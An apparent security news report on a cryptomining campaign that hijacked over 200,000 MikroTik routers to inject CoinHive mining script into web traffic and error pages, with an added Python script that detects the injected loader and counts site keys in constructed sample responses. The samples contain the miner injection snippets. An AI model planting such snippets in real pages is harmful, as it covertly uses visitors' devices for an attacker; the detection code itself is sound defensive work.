Researchers at Trustwave have discovered a CoinHive cryptomining campaign that has compromised more than 200,000 MikroTik routers.
The researchers were alerted by a sharp rise in CoinHive activity in Brazil, and further investigation traced it back to MikroTik routers. The attackers behind the campaign exploit a vulnerability in the Winbox component of the routers. MikroTik patched the flaw within a day of its discovery, but a large number of routers have never received the update, and those unpatched devices are what the campaign runs on.
According to Trustwave's report, the attacker abuses the router's own built-in functionality to inject the CoinHive mining script into the webpages loaded by users whose traffic passes through the device. To alter that traffic, the attackers are using proof-of-concept code that appeared on GitHub.
Only one CoinHive site key has been observed across the affected devices. Since the site key is what ties mined Monero to a CoinHive account, a single key indicates that one threat actor is behind all of the attacks.
“If a user receives an error page of any kind while web browsing, they will get this custom error page which will mine CoinHive for the attacker,” the report said.
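The two indicators described above, the injected CoinHive loader and the single site key shared by every injection, are easy to check for in captured HTTP responses. The following script is an added example and is not code from Trustwave or from the campaign. It runs over a few constructed HTTP responses (the URLs, status codes, page bodies and the `EXAMPLEKEY...` site key are all made up for the example), flags responses that carry the CoinHive loader, extracts the site keys passed to `CoinHive.Anonymous(...)`, counts distinct keys to test the single-actor hypothesis, and separately lists injections that ride on error pages, which is the variant the report quotes.

```python
import re
from collections import Counter

# Constructed sample responses: (HTTP status, body). These are NOT captured
# traffic from the campaign; the site key below is a made-up placeholder.
SAMPLE_RESPONSES = {
    "http://example.test/index.html": (200, """<html><head><title>Home</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('EXAMPLEKEY00000000000000000001', {throttle: 0.2});
miner.start();</script>
</head><body>Hello</body></html>"""),
    "http://example.test/missing": (404, """<html><head><title>Not Found</title></head>
<body><h1>Error</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>new CoinHive.Anonymous("EXAMPLEKEY00000000000000000001").start();</script>
</body></html>"""),
    "http://example.test/clean.html": (200, "<html><body>nothing injected here</body></html>"),
    "http://example.test/plain-error": (500, "<html><body>Internal Server Error</body></html>"),
}

# The loader tag CoinHive published for in-browser mining.
LOADER_RE = re.compile(
    r'<script[^>]*src=["\']https?://coinhive\.com/lib/coinhive\.min\.js["\']', re.I)
# The site key is the first argument to the CoinHive.Anonymous constructor.
KEY_RE = re.compile(r'CoinHive\.Anonymous\(\s*["\']([A-Za-z0-9]+)["\']')


def find_injections(responses):
    """Return {url: [site_key, ...]} for every response carrying the loader."""
    hits = {}
    for url, (_status, body) in responses.items():
        if LOADER_RE.search(body):
            hits[url] = KEY_RE.findall(body)
    return hits


def key_counts(responses):
    """Count how often each site key appears across injected responses."""
    counter = Counter()
    for keys in find_injections(responses).values():
        counter.update(keys)
    return counter


def single_actor_indicator(responses):
    """True when exactly one site key is used by all injections seen."""
    return len(key_counts(responses)) == 1


def error_page_injections(responses):
    """URLs where an injected miner was served on an HTTP error response."""
    injected = find_injections(responses)
    return sorted(url for url, (status, _body) in responses.items()
                  if status >= 400 and url in injected)


if __name__ == "__main__":
    for url, keys in find_injections(SAMPLE_RESPONSES).items():
        print(f"injected: {url} keys={keys}")
    print("distinct site keys:", dict(key_counts(SAMPLE_RESPONSES)))
    print("single actor indicator:", single_actor_indicator(SAMPLE_RESPONSES))
    print("error-page injections:", error_page_injections(SAMPLE_RESPONSES))
```

In practice the input would be response bodies recorded by a proxy or IDS rather than the embedded samples; the check on the loader URL is deliberately strict, so a copycat hosting the miner script elsewhere would need its own pattern.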
The attack is spreading rapidly, and because the script is injected into traffic passing through the compromised routers, it has affected users who do not own any MikroTik hardware themselves but whose connection is routed through an infected device.